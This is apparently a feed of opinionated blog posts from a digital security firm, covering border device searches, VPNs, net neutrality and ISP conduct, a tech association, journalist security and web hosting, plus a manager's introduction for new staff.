"§5.3.1 If presented with an electronic device containing information that is protected by a passcode or encryption or other security mechanism, an Officer may request the individual's assistance in presenting the electronic device and the information contained therein in a condition that allows inspection of the device and its contents. Passcodes or other means of access may be requested and retained as needed ..."

CBP cannot force citizens to hand over passwords, but they can detain you and your devices for a limited time. Be prepared to stand your ground only if you understand the consequences of defying a federal agency, and treat any device which has left your supervision as potentially compromised.

CT, DE, FL, HI, ME, MA, NH, NJ, NY, RI, VT

It is estimated that two thirds of Americans live inside Title 8's constitution-free zone, which includes New York City, Los Angeles, Chicago, Houston, Philadelphia, Phoenix, San Antonio, San Diego, and San Jose. Eleven states are completely inside the zone.

According to the ACLU, CBP has established over 170 checkpoints inside the country. And while checkpoints are not supposed to be used for warrantless searches, they often are. Motorists who encounter these agents have the same choices faced by international travelers: keep dummy devices on you at all times or use encryption, stand your ground, and face detention.

Editorial Disclosure: Nefarious Laboratories has developed a comprehensive Digital Security & Training service for journalists, activists, and political campaigns.

Published January 10, 2018

]]>

VPN services are a vital tool for protecting free speech. Following the death of net neutrality, their business model is more vulnerable than ever. If they don't adapt to protect themselves from ISPs, they'll become obsolete.

Yesterday's virtual private networks were designed to give employees remote access to corporate servers. Today that same technology is used to anonymize internet activity using random exit nodes across the globe. It protects journalists, activists, and everyday citizens who don't want their personal browsing history stored, analyzed, and sold.

The best VPN services allow signups with gift cards and anonymous email accounts, and offer at least two high bandwidth servers. The loss of net neutrality has changed the game, and forward-thinking services will need to encrypt traffic with a minimum cipher of AES-128, and allow users to route traffic over multiple ports - including port 443. Together, all of these options will help protect users' identity and hide traffic from the prying eyes of ISPs and state actors.

Why AES And 443?

Without net neutrality, ISPs can eliminate VPN use by blocking the ports on which they operate. Private Internet Access operates over many ports, but only a handful (501, 502, 1197, 1198) support AES encryption. These are trivial to block. Other ports (53, 80, 443, 8080) cannot be blocked, but are limited to the outdated BF-CBC cipher. Not only is this an insecure protocol, it precludes use on network appliances such as home routers.

For VPNs to continue making money, protecting their user base is paramount. If ISPs force these companies to close up shop, there will be no turning back.

Published January 05, 2018

]]>

The Massachusetts Technology Leadership Council (MassTLC) is advertised as "the largest and most powerful technology association in the region" with a mission to "accelerate growth and innovation in the Massachusetts technology industry". When a member of the product management community urged us to join, we signed up for their entry-level membership ($275 per year). That was two years ago.

Recently, the FCC scrapped net neutrality, a set of rules which protected free speech on the internet. Without them, small businesses may end up behind a paywall, where potential customers might never learn of their existence. CenturyLink, Comcast, Verizon, and other telecoms stand to make billions. Strangely, MassTLC stayed silent on an issue which directly impacts their small business members.

"If you're the smartest person in the room, you're in the wrong room."

Unknown

Nefarious Labs COO Steven DeFrias and I attended MassTLC's CXO Holiday party, held on December 13, the night before the FCC's vote to scrap net neutrality. Around the room, the reaction was the same: "What vote?" "Hang on, what's net neutrality again?" I was surrounded by fellow tech CEOs, and on this particular topic, I was the smartest person in the room. Not a good sign.

I was introduced to the President & CEO of MassTLC, Tom Hopcroft - to pointedly ask his perspective on the upcoming vote. I had hoped for some kind of affirmation that those of us in the small business community were heard and supported. Tom deflected question after question, preferring to discuss MassTLC's support for progressive immigration policy. He mentioned Comcast and Verizon. "Aren't they members?" I asked.

It turns out that Amazon, Autodesk, CenturyLink, Chubb, Comcast, Deloitte, Google, Kaspersky Lab, Microsoft, Oracle, Raytheon, TiVo, and Verizon are all members of MassTLC. Most of these conglomerates aren't even located in Massachusetts. Chubb is an insurance company headquartered in Switzerland. Raytheon is a major U.S. defense contractor. Kaspersky Lab is currently under investigation by the FBI for illegal activity linked to the KGB. They are rumored to have paid $10,000 to join MassTLC in October 2017, months after the investigation was announced.

Wait a minute, why are we doing business with these people? Are we paying an organization which represents corporate interests for political reasons, for reasons which have nothing to do with innovation? How much do CenturyLink, Comcast, and Verizon pay to be members? Verizon has over 100,000 employees, and according to MassTLC's pricing page, companies with over 1,000 employees pay $16,500 annually. That's a lot of money. Does that buy them a seat at the table to which smaller members aren't invited? If MassTLC doesn't vocally and vehemently support net neutrality and the small businesses which depend on it, isn't this just bribery with extra steps? Money for a voice. Or for silence.

I don't have all the answers, but as the CEO of Nefarious Laboratories, it is my responsibility to act according to our moral principles. I cannot justify contributing to an organization which benefits corporate interests while harming our small business and endangering our prospects for success. And I cannot in good conscience remain a member of MassTLC when their President & CEO dodges the important questions surrounding net neutrality, members under federal investigation, and pay to play politics.

Published January 01, 2018

]]>

You stand on the platform waiting for your train. A man stands close to you. Too close. He takes out his phone and starts speaking in Russian, loudly, and when you look toward him, he's staring at you.

KGB intimidation tactics are on the rise as Russian activity has come under greater scrutiny by American press. Over the past few years, the attacks have become more sophisticated, with state-sponsored hacking groups like Fancy Bear targeting journalists' phones, computers, and messaging platforms.

Entire news organizations have been bombarded by phishing attacks, attempting to gather information on individuals and security measures via email and phone. In the past, journalists have had to focus on keeping secrets from the outside world; now they must also keep secrets from their own employer.

The AP identified journalists as the third-largest group on a hacking hit list obtained from cybersecurity firm Secureworks, after diplomatic personnel and U.S. Democrats. About 50 of the journalists worked at The New York Times. Others were prominent media figures in Ukraine, Moldova, the Baltics or Washington.

The Committee to Protect Journalists has produced a Technology Security guide, offering a rough outline of best practices. Originally published in 2012, the report contains misleading information and does not explicitly detail how to achieve a baseline security posture in today's digital environment.

Editorial Disclosure: Nefarious Laboratories has developed a comprehensive Digital Security & Training service for journalists, activists, and political campaigns.

Published December 22, 2017

UPDATE January 18, 2018

The Electronic Frontier Foundation and a mobile security firm have released a joint report detailing an organization known as Dark Caracal, operating out of the Lebanese General Security Directorate (GDGS) in Beirut. Since 2012, the group has stolen data from journalists, corporations, and military officers in 21 countries using malware hidden in fake versions of secure messaging apps. According to the report, the attacks relied heavily on social engineering, convincing targets to download and install the apps themselves.

]]>

For 83 years under the Communications Act of 1934, the Federal Communications Commission (FCC) has been tasked with regulating radio, television, wire, satellite, and cable. The commission has never directly represented the American people; its five commissioners are appointed by the President of the United States, leaving it a pawn in the hands of corrupt officials and a telecommunications oligopoly.

"We have, not one or two or three, but many, established monopolies in the United States. We have restricted credit, we have restricted opportunity, we have controlled development, and we have come to be one of the worst ruled, one of the most completely controlled and dominated, governments in the civilized world - no longer a government by free opinion, no longer a government by conviction and the vote of the majority, but a government by the opinion and the duress of small groups of dominant men.

If the government is to tell big business men how to run their business, then don't you see that big business men have to get closer to the government even than they are now? Don't you see that they must capture the government, in order not to be restrained too much by it? They have already captured it. They don't have to get there. They are there."

Woodrow Wilson, The New Freedom, 1913

In 1992, under the purview of the FCC, internet service providers (ISPs) claimed they would deliver high-speed internet service across the country, building fiber optic networks in every state. These networks were to be made available to any local internet service provider, creating new jobs and increasing competition in the market. To pay for the proposed rollout, virtually every state offered ISPs significant tax incentives, and allowed the companies to charge customers higher prices and fees for internet access. Today, the American people have given ISPs (Verizon, Comcast, AT&T, et al) over $400 billion dollars.

They Took The Money And Ran

In 2015, the Pew Research Center reported only 50% of rural communities had access to broadband internet, highlighting ISPs' failure to build networks. Including urban areas, the rate was only marginally improved: 66%, leaving one third of the country without broadband access. The same year, PBS reported competition in the broadband market was virtually non-existent, leaving half of Americans with the false "choice" of a single broadband provider (25+ Mbps) and a telephone-based provider (1 Mbps Max). This is the very definition of a duopoly, in which two suppliers collude to dominate the market. As a result, while consumers in other countries enjoy internet speeds 10x faster, Americans pay double or triple the price for slow internet access.

As tax benefits and inflated prices pushed ISP profits ever higher, executives spent the money on themselves. Last year, the CEO of Comcast was paid over $28 million including salary, bonuses, and stock options. The CEO of Verizon was paid over $17 million. While executives were busy pocketing American tax dollars, relaxed FCC regulations allowed ISPs to interfere with internet traffic, throttling and blocking competing services around the globe. This is what a "free market" looks like:

2005
Comcast secretly blocked file-sharing and peer-to-peer communications using a technique known as TCP Reset Spoofing, and refused to confirm their actions for two years until the Associated Press and the Electronic Frontier Foundation published reports.

2007
AT&T and Apple made a secret agreement to ban iPhone apps which allowed users to make phone calls over the AT&T network, instead forcing app developers to cripple their software or face rejection from Apple's App Store.

2011
MetroPCS announced it would block streaming video from all sources except YouTube over its 4G network. The company initially sued the FCC to force the issue, then agreed to a buyout from T-Mobile and dropped the suit.

2012
Verizon prevented its wireless network users from sharing their monthly data with any other device (known as "tethering") unless users agreed to pay a $20 monthly fee. Although the FCC eventually ordered Verizon to drop the fee, the company simply rolled it into more expensive monthly plans.

These practices and others, tantamount to legal misrepresentation and extortion, led to an increase in consumer complaints and lawsuits, and in 2015 the FCC was forced to issue a net neutrality order, codifying broadband internet as a utility service under three bright-line rules.

No Blocking: ISPs cannot block legal content or legal methods of access.

No Throttling: ISPs cannot slow speeds based on the content or method of access.

No Paid Prioritization: ISPs cannot accept payment in return for favorable access.

Not only does net neutrality prevent interference with internet traffic, it also guarantees freedom of speech online. Despite overwhelming support from Americans (including 72% of conservatives), three of the five FCC commissioners have already signaled their intent to repeal net neutrality. Given the likely outcome of the scheduled vote, Commissioner Mignon Clyburn has already issued her dissent.

Putting the vote in the hands of the FCC eliminates the voice of the American people, but Congress has the power to overrule a regulation. So ISPs bribed Congress. Republicans in Alabama, Arizona, Arkansas, California, Colorado, Florida, Georgia, Idaho, Indiana, Iowa, Kansas, Kentucky, Louisiana, Michigan, Minnesota, Mississippi, Missouri, Nebraska, New Jersey, New York, North Carolina, North Dakota, Ohio, Oklahoma, Oregon, Pennsylvania, South Carolina, Tennessee, Texas, Virginia, Washington, West Virginia, and Wisconsin sold you and this nation to the telecom lobby for a total of $15.5 million dollars.

The Era Of Information Asymmetry

In 2014, CEO Mark Zuckerberg attempted to launch a free internet service in India, with a catch: the service would only connect to a handful of websites, and most importantly, to Facebook. Around the country, citizens recognized this as an extortion-based business model and vehemently rejected the offer, culminating in a nationwide demonstration to establish net neutrality laws.

What happened in India won't happen here. Perhaps the most insidious threat to the future of free speech is free internet. Without net neutrality, ISPs could offer a free internet package: Google, Facebook, Netflix, Amazon, and Fox News. Those companies would pay a fortune to participate, but they would control what you search, what you watch, what you buy, and what you know. That's incredibly dangerous power, and a threat to democracy.

State attorneys general and digital rights groups including the EFF, Public Knowledge, and Free Press have promised to sue the FCC should they vote to repeal net neutrality. Jurisdiction will play a key role in their legal strategy given that some judges are more likely to stay the commission's order during the trial.

Editorial Disclosure: The CEO of Nefarious Laboratories currently holds a GMRS radio license, issued by the FCC.

Published December 08, 2017

]]>

Endurance International Group (EIG) delivers hosting, backup, analytics, digital advertising, and email marketing solutions to 5.37 million subscribers globally. Like a drug dealer, the company refers to their hosting packages as "gateway products". This is not an exaggeration, this is how they are described in the company's own annual report.

EIG operates over 80 subsidiary brands, including Bluehost, Constant Contact, Domain.com, FastDomain, HostGator, HostMonster, iPage, MyDomain, SiteBuilder, SinglePlatform, and TypePad. Each brand has its own marketing, social media fan base, and thousands of positive reviews. Some have Terms Of Use clauses which have influenced government policy and censored content on religious grounds.

This type of media consolidation promotes consumerism while limiting discussion and innovation, yet industry-authored campaigns brazenly claim consumerism is an "expression of innovative capacity". Federal regulators appear uninterested in addressing the issue. The resulting uncontested market space has been a boon for EIG, which earned $1.1 billion in revenue and $351 million in profit during the last fiscal year.

Security Vulnerabilities From 1995

How do these companies generate so much profit? By using outdated technology. Both Microsoft IIS and Apache web servers were introduced in 1995, in an era before default TLS and HTTP2 were even considered. No matter how many updates they receive, they're built on outdated principles and architectures, their patched vulnerabilities stacked like an unstable tower of jenga blocks. And that makes them cheap. They're cheap to install, to run, and to manage.

Even newer shared hosting platforms are (typically) configured with the most permissive security settings. This drives revenue for the hosting company in three ways. First, allowing clients to run virtually any code without restriction reduces potential calls to customer support. Second, tracking code is quietly inserted into each client site, collecting visitor information which is then sold to data mining companies. Third, relaxed security settings open doors for advertising partners to track site visitors after they leave the site.

5.37 Million Legal Timebombs

Many of the sites hosted on these platforms showcase meticulously crafted privacy policies which promise various data protections for visitors. But in truth, permissive security settings leave visitors exposed to weak authentication methods, cross-site tracking and exploits, and leaks of personally identifiable information.

This represents a massive legal risk to every organization (small businesses, universities, hospitals) using a shared hosting platform. They could be sued for failing to protect user data, and in the EU, website operators face significant fines under the General Data Protection Regulation (GDPR) when it goes into effect on May 25, 2018.

Captive Market By Any Other Name

Developing independently hosted content can be challenging for users who lack the requisite technical knowledge. Coupled with national security concerns, that leaves the majority of independent developers and consumers with limited shared hosting options.

Editorial Disclosure: Nefarious Laboratories offers secure hosting solutions for small businesses, non-profits, and individuals.

Published October 07, 2017

]]>

Hi welcome to the team.

This document is designed to help you understand how I think and work, and to accelerate our working relationship. It is not intended to replace the organic mutual understanding I hope to build as we work together. This is a living document; it will change as I grow.

My Role As A Manager

I am here to help you. You were hired for your experience and skills, and I am not going to tell you how to do your job. My goal is to maximize your performance and to help you grow as a professional. When you need help, you should ask for it without hesitation.

Provide context. Most of my day is spent identifying new trends, reframing existing concepts, and sharing that information with team members. These conversations will help you build and maintain a global perspective across our products and projects.

Cheer! No achievement is too small to celebrate. I believe in leading with positive reinforcement, and rewarding both individual and team successes.

I also write a lot of code.

My Principles & Vision

I believe we are the universe experiencing itself, that life is neither the destination nor the journey. It is important to me that people are treated fairly, and I prioritize human experiences over systems and profit. Profit is merely a consequence of our actions, the building blocks of our legacy.

If a company's persona is a reflection of its leadership, Nefarious Laboratories is a rebel. We seek to challenge and subvert the status quo (domestic surveillance, corporate greed, military contracts, closed source, anti-patterns, negligence, apathy) by uniting people to build better solutions. We value altruistic "troublemakers" and radical innovators with divergent interests.

I was nearly kicked out of my MBA for asking the Chairman of a Fortune 500 company how he could justify laying off 125 employees while the CEO received a $9 million raise the same year. When a toy company asked me to work on a project adding cameras and microphones to their toys, I refused. These actions and their consequences, more than mere words, define my adherence to my ethical principles.

I heavily bias toward action, and have little patience for unnecessary deliberation or indifference. Debating potential directions are often valuable, but I believe starting is the best way to find failure, growth, and mastery.

"A human being should be able to change a diaper, plan an invasion, butcher a hog, conn a ship, design a building, write a sonnet, balance accounts, build a wall, set a bone, comfort the dying, take orders, give orders, cooperate, act alone, solve equations, analyze a new problem, pitch manure, program a computer, cook a tasty meal, fight efficiently, die gallantly. Specialization is for insects." - Robert Heinlein

Our Average Week

We'll have a 1:1 meeting every week for at least 1 hour no matter what. These meetings are for you, and should cover topics of substance as well as your needs and feelings.

You can contact me 24 hours a day. I try to respond quickly, and I appreciate when you do too. I often work at night, including weekends. This is my choice. I do not expect you to work or respond to my messages during these hours. Unless a message is urgent, it can wait until you return to work.

Here's how I rank communication methods in order of preference: in person, phone call, text message, email. If your preferences differ, it is up to you to let me know.

My Expectations

Do amazing work. Let your intellectual curiosity and hunger drive you. Let me know if there is something preventing you from accomplishing this. When your task feels poorly defined, you should ask me for both context and clarification.

I never want to be the smartest person in the room. I'm ok with that and you should be too. The best solutions are often born from ideological diversity and healthy debate. You're expected to challenge assumptions and biases, not individuals.

Operate as a Directly Responsible Individual (you own your work). I believe failure is productive. If you feel you made a mistake, own up to it immediately so we can find a solution together, learn from it, and move forward.

Tell me when I screw up. I don't always recognize when I've screwed up. If I don't know what I did wrong, I'll very likely do it again.

When you need me to do something, ask me. I respond well to, "Ethan, I need X, can you help?" and poorly to, "Ethan, do X."

Published September 01, 2017

]]>